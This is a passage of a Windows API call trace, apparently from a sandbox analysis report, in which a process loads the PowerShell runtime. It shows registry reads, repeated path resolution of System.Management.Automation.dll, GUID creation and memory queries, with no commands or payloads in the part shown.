returned 0x0 [0089.843] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.843] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.843] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.843] RegCloseKey (hKey=0x324) returned 0x0 [0089.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0089.843] GetLastError () returned 0x0 [0089.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0089.843] GetLastError () returned 0x0 [0089.849] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x6d5279c6, Data2=0xd, Data3=0x4978, Data4=([0]=0xb1, [1]=0x3d, [2]=0xf9, [3]=0xf7, [4]=0x51, [5]=0x91, [6]=0xf3, [7]=0x2))) returned 0x0 [0089.849] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xc1c6d4ad, Data2=0x51ae, Data3=0x4d70, Data4=([0]=0xaf, [1]=0x21, [2]=0x77, [3]=0x3b, [4]=0x26, [5]=0xb9, [6]=0x44, [7]=0x0))) returned 0x0 [0089.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.849] GetLastError () returned 0x0 [0089.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.849] GetLastError () returned 0x0 [0089.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.849] GetLastError () returned 0x0 [0089.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.849] GetLastError () returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.864] GetLastError () returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.864] GetLastError () returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.864] GetLastError () returned 0x0 [0089.864] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe737493a, Data2=0xaaae, Data3=0x4669, Data4=([0]=0x96, [1]=0xa, [2]=0x33, [3]=0xa7, [4]=0x2b, [5]=0x85, [6]=0x75, [7]=0x5b))) returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.864] GetLastError () returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.864] GetLastError () returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.864] GetLastError () returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.864] GetLastError () returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.864] GetLastError () returned 0x0 [0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.865] GetLastError () returned 0x0 [0089.866] VirtualQuery (in: lpAddress=0x13ce44, lpBuffer=0x13de44, dwLength=0x1c | out: lpBuffer=0x13de44*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.866] VirtualQuery (in: lpAddress=0x13ce80, lpBuffer=0x13de80, dwLength=0x1c | out: lpBuffer=0x13de80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.866] GetLastError () returned 0x0 [0089.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.867] VirtualQuery (in: lpAddress=0x13d1b0, lpBuffer=0x13e1b0, dwLength=0x1c | out: lpBuffer=0x13e1b0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.867] VirtualQuery (in: lpAddress=0x13d1b0, lpBuffer=0x13e1b0, dwLength=0x1c | out: lpBuffer=0x13e1b0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.867] GetLastError () returned 0x0 [0089.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.868] GetLastError () returned 0x0 [0089.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.868] GetLastError () returned 0x0 [0089.868] VirtualQuery (in: lpAddress=0x13d1b0, lpBuffer=0x13e1b0, dwLength=0x1c | out: lpBuffer=0x13e1b0*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.868] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.868] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.869] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.869] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.869] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.870] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.870] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.870] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.870] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.870] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.871] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.871] VirtualQuery (in: lpAddress=0x13cfec, lpBuffer=0x13dfec, dwLength=0x1c | out: lpBuffer=0x13dfec*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.871] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.872] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.872] VirtualQuery (in: lpAddress=0x13d148, lpBuffer=0x13e148, dwLength=0x1c | out: lpBuffer=0x13e148*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.872] VirtualQuery (in: lpAddress=0x13d184, lpBuffer=0x13e184, dwLength=0x1c | out: lpBuffer=0x13e184*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.872] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x8d1a2320, Data2=0xfa49, Data3=0x412c, Data4=([0]=0x8b, [1]=0xfc, [2]=0x28, [3]=0xf4, [4]=0x42, [5]=0xc2, [6]=0x15, [7]=0xbb))) returned 0x0 [0089.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.872] GetLastError () returned 0x0 [0089.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.872] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.873] GetLastError () returned 0x0 [0089.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, 